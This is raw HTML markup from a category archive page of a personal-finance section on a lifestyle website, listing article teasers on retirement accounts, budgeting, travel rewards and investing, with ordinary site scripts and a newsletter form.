src='https://cdnjs.cloudflare.com/ajax/libs/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js?ver=3.1.13'></script> <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery-infinitescroll/3.0.5/infinite-scroll.pkgd.min.js?ver=3.0.5'></script> <script src='https://www.themix.net/js/v1/global.js?ver=1.0.5'></script> <script src='https://malsup.github.io/jquery.form.js?ver=3.51.0'></script> <script src='https://www.google.com/recaptcha/api.js?ver=1531759913576'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.themix.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.themix.net/wp-includes/wlwmanifest.xml" /> <meta name="onesignal" content="wordpress-plugin" /> <link rel="manifest" href="https://www.themix.net/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/manifest.json.php?gcm_sender_id=" /> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script> <script> window.OneSignal = window.OneSignal || []; OneSignal.push( function() { OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php"; OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php"; OneSignal.SERVICE_WORKER_PARAM = { scope: '/' }; OneSignal.setDefaultNotificationUrl("https://www.themix.net"); var oneSignal_options = {}; window._oneSignalInitOptions = oneSignal_options; oneSignal_options['wordpress'] = true; oneSignal_options['appId'] = '75832125-b945-4887-91ef-44d6da0da0f3'; oneSignal_options['autoRegister'] = true; oneSignal_options['welcomeNotification'] = { }; oneSignal_options['welcomeNotification']['title'] = "TheMix.net"; oneSignal_options['welcomeNotification']['message'] = "Thanks for subscribing to notifications!"; oneSignal_options['path'] = "https://www.themix.net/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/"; oneSignal_options['safari_web_id'] = "web.onesignal.auto.4cf0d27e-fe33-43e6-b134-272c9aaf00b9"; oneSignal_options['promptOptions'] = { }; oneSignal_options['promptOptions']['actionMessage'] = 'Get new stories from TheMix!'; oneSignal_options['notifyButton'] = { }; oneSignal_options['notifyButton']['enable'] = true; oneSignal_options['notifyButton']['position'] = 'bottom-left'; oneSignal_options['notifyButton']['theme'] = 'default'; oneSignal_options['notifyButton']['size'] = 'medium'; oneSignal_options['notifyButton']['prenotify'] = true; oneSignal_options['notifyButton']['showCredit'] = true; oneSignal_options['notifyButton']['text'] = {}; oneSignal_options['notifyButton']['colors'] = {}; oneSignal_options['notifyButton']['colors']['circle.background'] = '#0080ff'; oneSignal_options['notifyButton']['colors']['pulse.color'] = '#0080ff'; oneSignal_options['notifyButton']['colors']['dialog.button.background'] = '#0080ff'; oneSignal_options['autoRegister'] = false; OneSignal.showHttpPrompt(); OneSignal.init(window._oneSignalInitOptions); }); function documentInitOneSignal() { var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt"); var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); }; for(var i = 0; i < oneSignal_elements.length; i++) oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false); } if (document.readyState === 'complete') { documentInitOneSignal(); } else { window.addEventListener("load", function(event){ documentInitOneSignal(); }); } </script> <script> OneSignal.push(function() { OneSignal.on('subscriptionChange', function (isSubscribed) { // console.log("The user's subscription state is now:", isSubscribed); if (isSubscribed === true) { OneSignal.sendTags({ lifestyle_entertainment: 'true' }).then(function(tagsSent) { console.log(tagsSent); }); } }); }); </script> <link rel="icon" href="https://www.themix.net/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="https://www.themix.net/favicon.ico" type="image/x-icon" /> <link rel="apple-touch-icon-precomposed" href="https://www.themix.net/files/images/apple-touch-icon.png" /> <link rel="apple-touch-icon-precomposed" sizes="57x57" href="https://www.themix.net/files/images/apple-touch-icon-57.png" /> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://www.themix.net/files/images/apple-touch-icon-72.png" /> <link rel="apple-touch-icon-precomposed" sizes="76x76" href="https://www.themix.net/files/images/apple-touch-icon-76.png" /> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://www.themix.net/files/images/apple-touch-icon-114.png" /> <link rel="apple-touch-icon-precomposed" sizes="120x120" href="https://www.themix.net/files/images/apple-touch-icon-120.png" /> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://www.themix.net/files/images/apple-touch-icon-144.png" /> <link rel="apple-touch-icon-precomposed" sizes="152x152" href="https://www.themix.net/files/images/apple-touch-icon-152.png" /> <link rel="apple-touch-icon-precomposed" sizes="180x180" href="https://www.themix.net/files/images/apple-touch-icon-180.png" /> <link rel="apple-touch-icon-precomposed" sizes="192x192" href="https://www.themix.net/files/images/apple-touch-icon-192.png" /> <meta name="msapplication-TileImage" content="https://www.themix.net/files/images/msapplication-icon-144.png"> <meta name="msapplication-TileColor" content="#eeeeee"> <meta name="apple-mobile-web-app-status-bar-style" content="black" /> <meta name="viewport" content="initial-scale=1, viewport-fit=cover" /> <script src="https://cdn.intermarkets.net/u/Intermarkets/TheMixNet/TheMixNet_targeting.js"></script> </head> <body class="archive category category-thefinancegenie category-60623 device-desktop site-global site-live"> <div id="fb-root"></div><script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = 'https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v3.0&appId='; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="block search-container" style="display:none;"> <div class="close-button"><a class="close-search">close</a></div> <div class="content-wrapper"> <div class="content"> <div class="text"> <fieldset class="search-form"> <form role="search" method="get" action="https://www.themix.net/"> <input id="s" type="text" name="s" placeholder="Start search..." onfocus="this.placeholder=''" onblur="this.placeholder='Start search...'" name="s" tabindex="1" class="search"> <input type="submit" value="&rsaquo;" tabindex="2" class="button"> </form> </fieldset> </div> </div> </div> </div> <div id="top"> <div class="wrap"> <header id="header"> <div class="masterhead"> <div class="inner"> <div class="nav network-nav"> <nav> <div class="menu-network-nav-header-container"><ul id="menu-network-nav-header" class="menu network-nav-carousel owl-carousel owl-theme"><li id="menu-item-138944" class="tmx menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-138944"><a href="https://www.themix.net/"><span class="icon grayscale"></span>TheMix.net<span class="icon color"></span></a></li> <li id="menu-item-138945" class="tmn menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138945"><a href="https://www.themix.net/category/tellmenow/"><span class="icon grayscale"></span>TellMeNow<span class="icon color"></span></a></li> <li id="menu-item-138946" class="ci menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138946"><a href="https://www.themix.net/category/cagedinsider/"><span class="icon grayscale"></span>Caged Insider<span class="icon color"></span></a></li> <li id="menu-item-138947" class="fl menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138947"><a href="https://www.themix.net/category/fightline/"><span class="icon grayscale"></span>Fightline<span class="icon color"></span></a></li> <li id="menu-item-138948" class="mmaf menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138948"><a href="https://www.themix.net/category/mmafrenzy/"><span class="icon grayscale"></span>MMA Frenzy<span class="icon color"></span></a></li> <li id="menu-item-138949" class="wn menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138949"><a href="https://www.themix.net/category/wrestlenewz/"><span class="icon grayscale"></span>Wrestle Newz<span class="icon color"></span></a></li> <li id="menu-item-138950" class="ri menu-item menu-item-type-taxonomy menu-item-object-category menu-item-138950"><a href="https://www.themix.net/category/ringsideintel/"><span class="icon grayscale"></span>Ringside Intel<span class="icon color"></span></a></li> <li id="menu-item-141421" class="bic menu-item menu-item-type-taxonomy menu-item-object-category menu-item-141421"><a href="https://www.themix.net/category/boundingintocomics/"><span class="icon grayscale"></span>Bounding Into Comics<span class="icon color"></span></a></li> <li id="menu-item-141422" class="kn menu-item menu-item-type-taxonomy menu-item-object-category menu-item-141422"><a href="https://www.themix.net/category/kayfabenews/"><span class="icon grayscale"></span>Kayfabe News<span class="icon color"></span></a></li> <li id="menu-item-145997" class="fg menu-item menu-item-type-taxonomy menu-item-object-category current-menu-item menu-item-145997"><a href="https://www.themix.net/category/thefinancegenie/" aria-current="page"><span class="icon grayscale"></span>The Finance Genie<span class="icon color"></span></a></li> <li id="menu-item-138953" class="mmal menu-item menu-item-type-custom menu-item-object-custom menu-item-138953"><a target="_blank" rel="noopener noreferrer" href="https://www.mmalinker.com"><span class="icon grayscale"></span>MMA Linker<span class="icon color"></span></a></li> </ul></div> </nav> </div> <div class="nav main-nav"> <nav class="with-dropdown"> <div class="menu-main-nav-global-header-container"><ul id="menu-main-nav-global-header" class="menu"><li id="menu-item-138918" class="reduced-menu hide-res-full hide-res-1920 hide-res-1600 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-138918"><a><span class="icon before"></span>Menu<span class="icon after"></span></a><span class="arrow"></span> <ul class="sub-menu"> <li id="menu-item-145978" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-145978"><a href="https://www.themix.net/category/entertainment/"><span class="icon before"></span>Entertainment<span class="icon after"></span></a><span class="arrow"></span> <ul class="sub-menu"> <li id="menu-item-145980" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145980"><a href="https://www.themix.net/category/entertainment/comics/"><span class="icon before"></span>Comics<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145979" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145979"><a href="https://www.themix.net/category/entertainment/celebrity/"><span class="icon before"></span>Celebrity<span class="icon after"></span></a><span class="arrow"></span></li> </ul> </li> <li id="menu-item-145981" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145981"><a href="https://www.themix.net/category/lifestyle/"><span class="icon before"></span>Lifestyle<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145982" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145982"><a href="https://www.themix.net/category/money/"><span class="icon before"></span>Money<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145983" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-145983"><a href="https://www.themix.net/category/sports/"><span class="icon before"></span>Sports<span class="icon after"></span></a><span class="arrow"></span> <ul class="sub-menu"> <li id="menu-item-145984" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145984"><a href="https://www.themix.net/category/sports/mma/"><span class="icon before"></span>MMA<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145985" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145985"><a href="https://www.themix.net/category/sports/wrestling/"><span class="icon before"></span>Wrestling<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-146042" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146042"><a target="_blank" rel="noopener noreferrer" href="https://www.mmalinker.com/?utm_source=themix.net"><span class="icon before"></span>Forum<span class="icon after"></span></a><span class="arrow"></span></li> </ul> </li> <li id="menu-item-146053" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146053"><a href="https://www.themix.net/video/"><span class="icon before"></span>Video<span class="icon after"></span></a><span class="arrow"></span></li> </ul> </li> <li id="menu-item-145986" class="hide-res-1440 hide-res-1280 hide-res-1024 hide-res-900 hide-res-768 hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-145986"><a href="https://www.themix.net/category/entertainment/"><span class="icon before"></span>Entertainment<span class="icon after"></span></a><span class="arrow"></span> <ul class="sub-menu"> <li id="menu-item-145988" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145988"><a href="https://www.themix.net/category/entertainment/comics/"><span class="icon before"></span>Comics<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145987" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145987"><a href="https://www.themix.net/category/entertainment/celebrity/"><span class="icon before"></span>Celebrity<span class="icon after"></span></a><span class="arrow"></span></li> </ul> </li> <li id="menu-item-145990" class="hide-res-1440 hide-res-1280 hide-res-1024 hide-res-900 hide-res-768 hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145990"><a href="https://www.themix.net/category/lifestyle/"><span class="icon before"></span>Lifestyle<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145991" class="hide-res-1440 hide-res-1280 hide-res-1024 hide-res-900 hide-res-768 hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145991"><a href="https://www.themix.net/category/money/"><span class="icon before"></span>Money<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145992" class="hide-res-1440 hide-res-1280 hide-res-1024 hide-res-900 hide-res-768 hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-145992"><a href="https://www.themix.net/category/sports/"><span class="icon before"></span>Sports<span class="icon after"></span></a><span class="arrow"></span> <ul class="sub-menu"> <li id="menu-item-145993" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145993"><a href="https://www.themix.net/category/sports/mma/"><span class="icon before"></span>MMA<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145994" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-145994"><a href="https://www.themix.net/category/sports/wrestling/"><span class="icon before"></span>Wrestling<span class="icon after"></span></a><span class="arrow"></span></li> <li id="menu-item-145996" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-145996"><a target="_blank" rel="noopener noreferrer" href="https://www.mmalinker.com/?utm_source=themix.net"><span class="icon before"></span>Forum<span class="icon after"></span></a><span class="arrow"></span></li> </ul> </li> <li id="menu-item-146054" class="hide-res-1440 hide-res-1280 hide-res-1024 hide-res-900 hide-res-768 hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-custom menu-item-object-custom menu-item-146054"><a href="https://www.themix.net/video/"><span class="icon before"></span>Video<span class="icon after"></span></a><span class="arrow"></span></li> </ul></div> </nav> </div> <div class="logo"> <div class="tmx-icon with-network"><a href="https://www.themix.net">TheMix.net</a></div> <div class="divider"></div> <div class="network-icon fg"><a href="https://www.themix.net/category/thefinancegenie/">The Finance Genie</a></div> </div> <div class="social-search-notifications"> <div class="social"> <div class="social-buttons"> <div class="menu-social-buttons-fg-header-container"><ul id="menu-social-buttons-fg-header" class="menu"><li id="menu-item-145999" class="hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-custom menu-item-object-custom menu-item-145999"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheFinanceGenie/">Facebook</a></li> <li id="menu-item-146000" class="hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-custom menu-item-object-custom menu-item-146000"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheFinanceGenie">Twitter</a></li> <li id="menu-item-146001" class="hide-res-1024 hide-res-900 hide-res-768 hide-res-640 hide-res-480 hide-res-320 menu-item menu-item-type-custom menu-item-object-custom menu-item-146001"><a href="#subscribe">Subscribe</a></li> </ul></div> </div> </div> <div class="search-notify"> <div class="search search-toggle"><a href="#search"><span class="icon"></span> Search</a></div> </div> </div> <div class="color-bar"> <div class="green"></div> <div class="blue"></div> <div class="teal"></div> <div class="purple"></div> <div class="pink"></div> <div class="orange"></div> <div class="red"></div> </div> <div class="top-shadow opacity-09"></div> </div> </div> </header> <div class="nav-background"></div> <div class="page-wrapper"> <div class="trending-tags block"> <div class="inner"> <div class="content pad-top-3 pad-bottom-1"> <div class="trending-tags-wrapper"> </div> </div> </div> </div> <div class="latest-articles block"> <div class="inner"> <div class="content pad-top-1 pad-bottom-2"> <div class="articles-wrapper"> <div class="articles masonry full"> <div class="grid-sizer"></div> <article class="article item featured-post"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/401k-box_1200x675-800x450.jpg);"><a href="https://www.themix.net/2019/03/4-common-401k-mistakes-people-make/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2019/03/4-common-401k-mistakes-people-make/">4 Common 401k Mistakes People Make</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/vmistry/" title="Posts by Vipul Mistry" rel="author">Vipul Mistry</a></span></div> </div> </div> </article> <article class="article item featured-post"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-9-800x533.jpg);"><a href="https://www.themix.net/2019/02/what-are-the-dave-ramsey-baby-steps-do-they-really-work/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2019/02/what-are-the-dave-ramsey-baby-steps-do-they-really-work/">What Are The Dave Ramsey Baby Steps? Do They Really Work?</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item featured-post"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/2019.03.13-01.05-themixnet-5c8900320a82a-800x495.jpg);"><a href="https://www.themix.net/2019/02/the-best-time-to-buy-a-month-by-month-guide-to-scoring-big-bargains/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2019/02/the-best-time-to-buy-a-month-by-month-guide-to-scoring-big-bargains/">The Best Time To Buy: A Month-By-Month Guide To Scoring Big Bargains</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/vmistry/" title="Posts by Vipul Mistry" rel="author">Vipul Mistry</a></span></div> </div> </div> </article> <article class="article item featured-post"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-263532-800x531.jpeg);"><a href="https://www.themix.net/2018/09/are-online-surveys-worth-your-time-can-surveys-actually-pay-well/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/09/are-online-surveys-worth-your-time-can-surveys-actually-pay-well/">Are Online Surveys Worth Your Time? Can Surveys Actually Pay Well?</a></h2> <p class="excerpt">Are online surveys worth your time? Learn how much you can make taking online surveys. And how the pay compares to other side hustles.</p> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> </div> </div> </div> </div> </div> <div class="page-header block contained-width width-1152" style="background-image: url(https://www.themix.net/files/2019/02/FG-BG.jpg); background-color: #0a5a25;"> <div class="inner"> <div class="content pad-top-2 pad-bottom-2"> <div class="bio-info-wrap"> <div class="bio-image light"> <div class="image"><a href="https://www.themix.net/brands/#thefinancegenie" style="background-image: url(https://www.themix.net/files/2019/02/FG-IMG.jpg);"></a></div> </div> <div class="bio-info"> <div class="text font-white text-shadow"> <h1><a href="https://www.themix.net/brands/#thefinancegenie">The Finance Genie</a></h1> <p>The Finance Genie understands the importance of financial literacy and creating a solid foundation for future financial success.</p> <ul class="social-email"> <li class="social"><a href="https://www.facebook.com/TheFinanceGenie/">https://www.facebook.com/TheFinanceGenie/</a></li> <li class="social"><a href="https://twitter.com/TheFinanceGenie">https://twitter.com/TheFinanceGenie</a></li> <li class="social"><a href="https://www.themix.net/category/thefinancegenie/#subscribe">https://www.themix.net/category/thefinancegenie/#subscribe</a></li> <li class="social"><a href="https://www.themix.net/category/thefinancegenie/feed/" target="_blank">RSS</a></li> <li class="email"><a href="/cdn-cgi/l/email-protection#05636c6b646b666062606b6c6045716d60686c7d2b6b60713a7670676f606671384d607c25516d6025436c6b646b66602542606b6c6024">Email The Finance Genie</a></li> </ul> </div> </div> </div> </div> </div> </div> <div class="top-advertisement"> <div class="inner"> <div class="advertisement leaderboard align-center ad-desktop-728x90"> <div class="ad-label">Advertisement</div> <div class="ad"><div id="imk728top"></div></div> </div> </div> </div> <div class="block"> <div class="inner"> <div class="content-main content pad-top-3"> <div class="left"> <div class="content-main-inner articles-list"> <div class="articles-wrapper"> <div class="infinite-content articles masonry full"> <div class="grid-sizer"></div> <article class="article item item-1"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/instant-cheque-cashing-600x399.jpg);"><a href="https://www.themix.net/2018/09/guidelines-on-fast-cash-loans-with-no-credit-check/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/09/guidelines-on-fast-cash-loans-with-no-credit-check/">Guidelines on Fast Cash Loans with no Credit Check</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/tfgguestcontributor/" title="Posts by Guest Contributor" rel="author">Guest Contributor</a></span></div> </div> </div> </article> <article class="article item item-2"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-1309644-600x449.jpeg);"><a href="https://www.themix.net/2018/09/best-airline-miles/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/09/best-airline-miles/">The Best Airline Miles Program for Award Flights</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/jpotaka/" title="Posts by Josh Patoka" rel="author">Josh Patoka</a></span></div> </div> </div> </article> <article class="article item item-3"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/Start_With_ETFs-600x292.png);"><a href="https://www.themix.net/2018/09/beginner-investors-start-etfs/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/09/beginner-investors-start-etfs/">Why Beginner Investors Should Start With ETFs</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/vmistry/" title="Posts by Vipul Mistry" rel="author">Vipul Mistry</a></span></div> </div> </div> </article> <article class="article item item-4"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/stages_of_financial_planning-600x221.png);"><a href="https://www.themix.net/2018/09/understanding-different-stages-financial-plannin/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/09/understanding-different-stages-financial-plannin/">Understanding the Five Stages of Financial Planning</a></h2> <p class="excerpt">From student to retirement, the infographic explains the different stages of financial planning and why each stage is important.</p> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div class="author">by <span class="author-name"><a href="https://www.themix.net/author/tfgguestcontributor/" title="Posts by Guest Contributor" rel="author">Guest Contributor</a></span></div> </div> </div> </article> <div class="item wide"> <div class="email-signup infeed"> <div class="logo-form-social"> <div class="mix-it-up-logo"><a href="#"></a></div> <div class="news-subscribe-form enews"> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>var rfnames=new Array("CI_email","CI_custom5","CI_custom4","CI_custom6"),rfdesc=new Array("Email Address","CI_Signup_Date","Source","source1"),val_email_names=new Array("CI_email"),val_email_desc=new Array("Email Address"),val_phone_names=new Array,val_phone_desc=new Array,val_zipcode_names=new Array,val_zipcode_desc=new Array,val_numeric_names=new Array,val_numeric_desc=new Array,whitespace_CI=" \t\n\r";function isValidEmail_CI(e){if(isEmpty_CI(e))return!1;if(isWhitespace_CI(e))return!1;for(var r=1,n=e.length;r<n&&"@"!=e.charAt(r);)r++;if(r>=n||"@"!=e.charAt(r))return!1;for(r+=2;r<n&&"."!=e.charAt(r);)r++;return!(r>=n-1||"."!=e.charAt(r))}function isValidPhone_CI(e){if(isEmpty_CI(e))return!1;if(isWhitespace_CI(e))return!1;return!!/^\(?([0-9]{3})\)?[-. ]?([0-9]{3})[-. ]?([0-9]{4})$/.test(e)}function isValidZipCode_CI(e){if(isEmpty_CI(e))return!1;if(isWhitespace_CI(e))return!1;return!!/(^\d{5}$)|(^\d{5}-\d{4}$)/.test(e)}function isNumeric_CI(e){return!isEmpty_CI(e)&&(!isWhitespace_CI(e)&&(!isNaN(parseFloat(e))&&isFinite(e)))}function isEmpty_CI(e){return null==e||0==e.length}function isWhitespace_CI(e){var r;if(isEmpty_CI(e))return!0;for(r=0;r<e.length;r++){var n=e.charAt(r);if(-1==whitespace_CI.indexOf(n))return!1}return!0}function checkForm_CI_1(){for(var e="",r=0;r<rfnames.length;r++)""==document.CI_subscribeForm_1.elements[rfnames[r]].value&&(document.CI_subscribeForm_1.elements[rfnames[r]].style.backgroundColor="#f9eaeb",e=e+rfdesc[r]+" is required \n\r");for(r=0;r<val_email_names.length;r++)""==document.CI_subscribeForm_1.elements[val_email_names[r]].value||isValidEmail_CI(document.CI_subscribeForm_1.elements[val_email_names[r]].value)||(document.CI_subscribeForm_1.elements[val_email_names[r]].style.backgroundColor="#f9eaeb",e=e+val_email_desc[r]+" must be a valid email address. ([email protected])\n\r");for(r=0;r<val_phone_names.length;r++)""==document.CI_subscribeForm_1.elements[val_phone_names[r]].value||isValidPhone_CI(document.CI_subscribeForm_1.elements[val_phone_names[r]].value)||(document.CI_subscribeForm_1.elements[val_phone_names[r]].style.backgroundColor="#f9eaeb",e=e+val_phone_desc[r]+" must be a valid phone number \n\r");for(r=0;r<val_zipcode_names.length;r++)""==document.CI_subscribeForm_1.elements[val_zipcode_names[r]].value||isValidZipCode_CI(document.CI_subscribeForm_1.elements[val_zipcode_names[r]].value)||(document.CI_subscribeForm_1.elements[val_zipcode_names[r]].style.backgroundColor="#f9eaeb",e=e+val_zipcode_desc[r]+" must be a valid zipcode \n\r");for(r=0;r<val_numeric_names.length;r++)""==document.CI_subscribeForm_1.elements[val_numeric_names[r]].value||isNumeric_CI(document.CI_subscribeForm_1.elements[val_numeric_names[r]].value)||(document.CI_subscribeForm_1.elements[val_numeric_names[r]].style.backgroundColor="#f9eaeb",e=e+val_numeric_desc[r]+" must be numeric \n\r");if(e.length>1)return alert(e),!1;document.CI_subscribeForm_1.submit()}</script> <form action="https://portal.criticalimpact.com/wc/wc.cfm" name="CI_subscribeForm_1" id="CI_subscribeForm_1" method="post"> <input type="hidden" name="CI_thankyou" value="https://portal.criticalimpact.com/wc/thankyou.cfm"> <input type="hidden" name="CI_thankyou2" value="https://portal.criticalimpact.com/wc/thankyou2.cfm"> <input type="hidden" name="CI_err" value="https://portal.criticalimpact.com/wc/error.cfm"> <input type="hidden" name="CI_Action" value="sub"> <input type="hidden" name="CI_LID" value="2621417731"><input type="hidden" name="CI_MID" value="147471090"><input type="hidden" name="CI_FID2" value="1000K2200000000018Q"><input type="hidden" name="CI_triggeredid" value="843369541"> <input type="hidden" name="CI_custom5" value="05/16/2019 09:45:11"> <input type="hidden" name="CI_custom4" value="tmx"> <input type="hidden" name="CI_custom6" value="fg-infeed-1"> <input type="text" name="CI_email" maxlength="150" placeholder="Enter Email"> <button id="CI_submit" name="CI_submit" type="button" onClick="checkForm_CI_1();">Subscribe</button> </form> <script>function my_getParamVal(param) { var query = location.search; var regexp = new RegExp("[\\?&]" + param + "\=([^\&#]*)", "i"); var val = query.match(regexp) || ""; return val[1] || ""; } if (document.forms.CI_subscribeForm_1 !== undefined && document.forms.CI_subscribeForm_1.CI_email !== undefined){ var t_email = my_getParamVal('myemail'); if (t_email !== undefined && typeof t_email === 'string' && t_email.length > 5) { document.forms.CI_subscribeForm_1.CI_email.value = t_email; } }</script> </div> <div class="social-buttons"> <div class="menu-social-buttons-fg-enews-container"><ul id="menu-social-buttons-fg-enews" class="menu"><li id="menu-item-146006" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146006"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheFinanceGenie/">Facebook</a></li> <li id="menu-item-146007" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-146007"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheFinanceGenie">Twitter</a></li> </ul></div> </div> </div> <div class="text"> <h4>Subscribe and get our daily emails and follow us on social media.</h4> </div> <div class="terms-privacy"><p>By opting in, you agree to receive emails with the latest in Lifestyle + Entertainment from TellMeNow. Your information will not be shared with or sold to 3rd parties.</p></div> </div> </div> <article class="article item item-5"> <div class="image" style="background-image:url(https://www.themix.net/files/2019/02/pexels-photo-271639-1-600x419.jpeg);"><a href="https://www.themix.net/2018/09/the-most-valuable-hotel-rewards-points-you-must-join/"></a></div> <div class="text"> <h3 class="category money "><span class="icon"></span> Money</h3> <h2 class="title"><a href="https://www.themix.net/2018/09/the-most-valuable-hotel-rewards-points-you-must-join/">The Most Valuable Hotel Rewards Points You Must Join</a></h2> <div class="meta-data"> <div class="network-logo fg"><a href="https://www.themix.net/category/thefinancegenie/" title="The Finance Genie">The Finance Genie</a></div> <div class="divider">/</div> <div 